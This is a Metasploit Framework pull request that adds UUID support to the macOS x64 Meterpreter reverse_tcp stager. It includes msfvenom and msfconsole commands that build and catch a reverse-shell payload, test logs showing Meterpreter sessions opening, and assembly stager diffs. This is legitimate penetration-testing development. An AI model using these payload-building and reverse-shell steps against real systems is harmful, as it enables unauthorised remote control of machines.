### PR TITLE
Add UUID support to the OSX x64 reverse_tcp stager

### LINKED ISSUE #12837: Add UUID support for osx/*/meterpreter/reverse_tcp
At the moment, the Mac OS X `reverse_tcp` stager seems to miss support for UUIDs. It would be nice to have this support when exposing the handler on the internet.

### PR DESCRIPTION
**Pull request by timwr**
Fixes https://github.com/rapid7/metasploit-framework/issues/12837
Ping @phra 

## Verification

- [x] `msfconsole -qx "use exploit/multi/handler; set payload osx/x64/meterpreter/reverse_tcp_uuid; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j"`
- [x] `msfvenom -p osx/x64/meterpreter/reverse_tcp_uuid PayloadUUIDRaw=4142434445464748 LHOST=$LHOST LPORT=4444 -f macho -o met`
- [x] **Verify** you get a session
- [x] **Verify** `sessions -v` shows 4142434445464748 as a UUID

### CODE REVIEW

**Comment by phra** [comment]
good job! unfortunately, atm i am unable to test this.

**Comment by gwillcox-r7** [comment]
Tested this out, seems to be working well:

```
*censored*$ git log
commit a9ce6e67ff64e75c053e887e8d82805fed3adef1 (HEAD -> land-pr13252, upstream/pr/13252)
Author: timwr <timwr@github>
Date:   Wed Apr 15 15:38:05 2020 +0800

    add RequiresMidStager to osx stagers

commit 9f740bca74a26ba5d4a74d864000a168e1cad87a
Author: timwr <timwr@github>
Date:   Tue Apr 14 14:18:21 2020 +0800

    fix #12837, add support for osx reverse_tcp_uuid

commit 574f6af503f6a07130922ffcc162a4b770a7ff0d
Author: Metasploit Bot <metasploit@rapid7.com>
Date:   Fri Apr 3 11:39:48 2020 -0500

    automatic module_metadata_base.json update
....
*censored*$ ./msfconsole -qx "use exploit/multi/handler; set payload osx/x64/meterpreter/reverse_tcp_uuid; set lhost 192.168.1.124; set lport 4444; set ExitOnSession false; run -j"
payload => osx/x64/meterpreter/reverse_tcp_uuid
lhost => 192.168.1.124
lport => 4444
ExitOnSession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.1.124:4444 
```

In a separate shell, ran the following command:

```
*censored*$ ./msfvenom -p osx/x64/meterpreter/reverse_tcp_uuid PayloadUUIDRaw=4142434445464748 LHOST=192.168.1.124 LPORT=4444 -f macho -o met
[-] No platform was selected, choosing Msf::Module::Platform::OSX from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 204 bytes
Final size of macho file: 17204 bytes
Saved as: met
*censored*$ chmod +x met
*censored*$ ./met
```

Once this was done, a new session was spawned, which has the right UUID:

```
msf5 exploit(multi/handler) > 
[*] Transmitting first stager...(210 bytes)
[*] Transmitting second stager...(8192 bytes)
[*] Sending stage (804084 bytes) to 192.168.1.124
[*] Meterpreter session 2 opened (192.168.1.124:4444 -> 192.168.1.124:56300) at 2020-04-21 23:55:21 -0500
jobs

Jobs
====

  Id  Name                    Payload                               Payload opts
  --  ----                    -------                               ------------
  0   Exploit: multi/handler  osx/x64/meterpreter/reverse_tcp_uuid  tcp://192.168.1.124:4444

msf5 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > background
[*] Backgrounding session 2...
msf5 exploit(multi/handler) > sessions -v

Active sessions
===============

  Session ID: 2
        Name: 
        Type: meterpreter osx
        Info: *censored* @ *censored* (uid=502, gid=20, euid=502, egid=20) @ 192.168.1.124
      Tunnel: 192.168.1.124:4444 -> 192.168.1.124:56300 (192.168.1.124)
         Via: exploit/multi/handler
   Encrypted: true
        UUID: 4142434445464748/x64=2/osx=9/2020-04-22T04:55:21Z
     CheckIn: 28s ago @ 2020-04-21 23:55:21 -0500
  Registered: No



msf5 exploit(multi/handler) >
```

File: lib/msf/core/payload/osx/x64/send_uuid.rb [hunk 1]
```diff
@@ -0,0 +1,42 @@
...
+        pop rdx
+        push 0x2000085
+        pop rax
+        syscall                   ; sendto(sockfd, addr, length)
+    ^
+
+    asm
+  end
+
+end
```
Comment (gwillcox-r7) [inline lib/msf/core/payload/osx/x64/send_uuid.rb:39]: Rest looks good, approved!

File: lib/msf/core/payload/osx/x64/reverse_tcp.rb [hunk 2]
```diff
@@ -0,0 +1,143 @@
...
+    push    rsp
+    pop     rsi
+    push    16
+    pop     rdx
+    push    0x2000062
+    pop     rax
+    syscall
+    jb retry
+
+#{asm_send_uuid if include_send_uuid}
```
Comment (gwillcox-r7) [inline lib/msf/core/payload/osx/x64/reverse_tcp.rb:97]: Looks like this is the only change here, and rest is all the same. Other code looks all good from reading the assembly and checking the logic. Approved.

**Review by gwillcox-r7 — CHANGES_REQUESTED** [review]
Minor changes needed, then should be good to merge in. Good work @timwr, this is a neat addition!

**Comment by gwillcox-r7** [comment]
One last update but forgot to show testing of normal reverse_tcp meterpreter shell on OSX to confirm that the updates haven't affected operational ability of this module and that we can now get UUIDs via this payload if we want:

```
*censored*$ ./msfconsole -qx "use exploit/multi/handler; set payload osx/x64/meterpreter/reverse_tcp; set lhost 192.168.1.124; set lport 4444; set ExitOnSession false; run -j"
payload => osx/x64/meterpreter/reverse_tcp
lhost => 192.168.1.124
lport => 4444
ExitOnSession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.1.124:4444 
msf5 exploit(multi/handler) > [*] Transmitting first stager...(210 bytes)
[*] Transmitting second stager...(8192 bytes)
[*] Sending stage (804084 bytes) to 192.168.1.124
[*] Meterpreter session 1 opened (192.168.1.124:4444 -> 192.168.1.124:64745) at 2020-04-22 15:56:33 -0500

msf5 exploit(multi/handler) > sessions -v

Active sessions
===============

  Session ID: 1
        Name: 
        Type: meterpreter osx
        Info: *censored* (uid=502, gid=20, euid=502, egid=20) @ 192.168.1.124
      Tunnel: 192.168.1.124:4444 -> 192.168.1.124:64745 (192.168.1.124)
         Via: exploit/multi/handler
   Encrypted: true
        UUID: 1cb62ed4dcbcedad/x64=2/osx=9/2020-04-22T20:56:33Z
     CheckIn: 12s ago @ 2020-04-22 15:56:33 -0500
  Registered: No



msf5 exploit(multi/handler) > 
```

**Comment by gwillcox-r7** [comment]
@timwr Just updated the options for RequiresMidStager in 546333b as looking over our framework it looks like only specific Linux based payloads ever use this value. None of our OSX payloads actually use this value at all so setting it doesn't make a difference. With that being said I added a comment in to note that it was originally set to `true` in case someone ends up updating it in the future. Rest of the review comments were just for record keeping and everything else looked good. Thanks for the contribution!

**Comment by gwillcox-r7** [comment]
#Release Notes
This PR adds a new payload type, <code>reverse_tcp_uuid</code> for OSX x64 systems which adds support for displaying UUID information. This PR also updates the existing <code>reverse_tcp</code> stager to print out UUID information if requested.

**Comment by gwillcox-r7** [comment]
# Release Notes
This PR adds a new payload type, <code>reverse_tcp_uuid</code> for OSX x64 systems which adds support for displaying UUID information. This PR also updates the existing <code>reverse_tcp</code> stager to print out UUID information if requested.

**Pull request merged**